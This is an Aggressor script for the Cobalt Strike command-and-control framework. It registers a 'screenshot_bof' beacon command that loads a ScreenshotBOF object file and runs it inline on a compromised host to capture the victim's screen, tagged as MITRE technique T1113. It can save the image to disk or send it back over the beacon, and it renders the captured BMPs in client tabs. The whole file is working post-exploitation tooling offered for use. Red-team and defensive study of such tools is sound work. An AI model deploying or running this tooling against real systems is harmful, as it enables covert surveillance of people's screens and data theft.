import javax.imageio.ImageIO; import java.awt.*; import javax.swing.JLabel; import javax.swing.ImageIcon; import; # This function takes in a screenshot and creates a JLabel to display the screenshot sub display_image { local('$screenshot $screenshot_bytes $bid $user $computer $client $MAX_IMAGE_WIDTH $MAX_IMAGE_HEIGHT $bias $image $width $height $icon $scaledIcon $component $tab_name'); $screenshot = $1; $screenshot_bytes = $screenshot['data']; $bid = $screenshot['bid']; $user = $screenshot['user']; $computer = beacon_info($bid, 'computer'); $client = getAggressorClient(); $MAX_IMAGE_WIDTH = [[[$client getTabManager] getTabbedPane] getWidth]; $MAX_IMAGE_HEIGHT = [[[$client getTabManager] getTabbedPane] getHeight]; $bais = [new ByteArrayInputStream: $screenshot_bytes]; $image = [ImageIO read: $bais]; $width = [$image getWidth]; $height = [$image getHeight]; $icon = [new ImageIcon: $image]; if ($width > $MAX_IMAGE_WIDTH) { $width = $MAX_IMAGE_WIDTH; } if ($height > $MAX_IMAGE_HEIGHT) { $height = $MAX_IMAGE_HEIGHT; } $scaledIcon = [new ImageIcon: [$image getScaledInstance: $width, $height, 4]]; $component = [new JLabel: $scaledIcon]; $tab_name = "ScreenshotBOF - $user\@$computer"; addTab($tab_name, $component, "..."); } # This function takes in a screenshot and creates a JLabel to display the screenshot sub display_downloaded { local('$screenshot $screenshot_bytes $bid $user $computer $client $MAX_IMAGE_WIDTH $MAX_IMAGE_HEIGHT $bias $image $width $height $icon $scaledIcon $component $tab_name'); $screenshot_bytes = $1; $file_name = $2; $client = getAggressorClient(); $MAX_IMAGE_WIDTH = [[[$client getTabManager] getTabbedPane] getWidth]; $MAX_IMAGE_HEIGHT = [[[$client getTabManager] getTabbedPane] getHeight]; $bais = [new ByteArrayInputStream: $screenshot_bytes]; $image = [ImageIO read: $bais]; $width = [$image getWidth]; $height = [$image getHeight]; $icon = [new ImageIcon: $image]; if ($width > $MAX_IMAGE_WIDTH) { $width = $MAX_IMAGE_WIDTH; } if ($height > $MAX_IMAGE_HEIGHT) { $height = $MAX_IMAGE_HEIGHT; } $scaledIcon = [new ImageIcon: [$image getScaledInstance: $width, $height, 4]]; $component = [new JLabel: $scaledIcon]; $tab_name = "ScreenshotBOF - $file_name"; addTab($tab_name, $component, "..."); } # Checks the screenshot when it comes in to see if it is a BMP, then if so, renders it in a new tab on screenshots { local('$screenshot $data'); $screenshot = $1; $data = $screenshot['data']; # Check the magic header of the data to see if it's a BMP if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") { display_image($screenshot); } } popup_clear("downloads"); popup downloads { # do nothing if nothing is selected if (size($1) == 0) { return; } item "Interact" { openOrActivate($1[0]["bid"]); } menu "&Color" { local('$ids'); $ids = map({ return $1["id"]; }, $1); insert_component(colorPanel("accents", $ids)); } item "Render &BMP" { local('$download $lpath $name $count'); foreach $count => $download ($1) { ($lpath, $name) = values($download, @("lpath", "name")); sync_download($lpath, script_resource("file $+ .$count"), lambda({ $handle = openf($1); $data = readb($handle, -1); closef($handle); #println(charAt($data, 0)); #println(charAt($data, 1)); if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") { display_downloaded($data, $1); } else { show_error("File is not a Bitmap image"); } deleteFile($1); }, \$name)); } } } popup_clear("screenshots"); popup screenshots { item "&Interact" { openOrActivate($1["bid"]); } menu "&Color" { insert_component(colorPanel("accents", $1["id"])); } item "&Save" { prompt_file_save($1["id"] . ".jpg", lambda({ local('$handle'); $handle = openf("> $+ $1"); writeb($handle, $data); closef($handle); show_message("Screenshot saved."); }, $data => $1["object"]["data"])); } separator(); item "&Remove" { redactobject($1["id"]); } item "Render &BMP" { $data = $1["object"]['data']; # Check the magic header of the data to see if it's a BMP if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") { display_image($1["object"]); } else { show_error("Image is not a Bitmap. It should render in Screenshots tab."); } } } #Register command beacon_command_register( "screenshot_bof", "Alternative screenshot capability that does not do fork n run", "Use: screenshot_bof [filename] [save method]\nSave methods:\n\t0: drop file to disk\n\t1: download over beacon\n\nTake a screenshot inline using a BOF. Screenshot is saved as BMP on disk or downloaded over beacon." ); alias screenshot_bof { local('$bid $barch $handle $data $args $target_pid'); $bid = $1; # figure out the arch of this session $barch = barch($bid); if (size(@_) != 3) { berror($1, "Syntax: screenshot_bof [filename] [save method 0/1] e.g. screenshot_bof file.bmp 1"); return; } # read in the right BOF file $handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj")); $data = readb($handle, -1); closef($handle); # FEATURE PUT ON HOLD DUE TO STABILITY # figure out if the profile chooses to chunk the post or not (getOnlyProfile) # $profile = data_query("metadata")["c2profile"]; # $getOnlyProfile = [$profile shouldChunkPosts]; # println($getOnlyProfile); $args = bof_pack($bid, "zi", $2, $3); # announce what we're doing btask($bid, "Running screenshot BOF by (@codex_tf2)", "T1113"); # execute it. beacon_inline_execute($bid, $data, "go", $args); }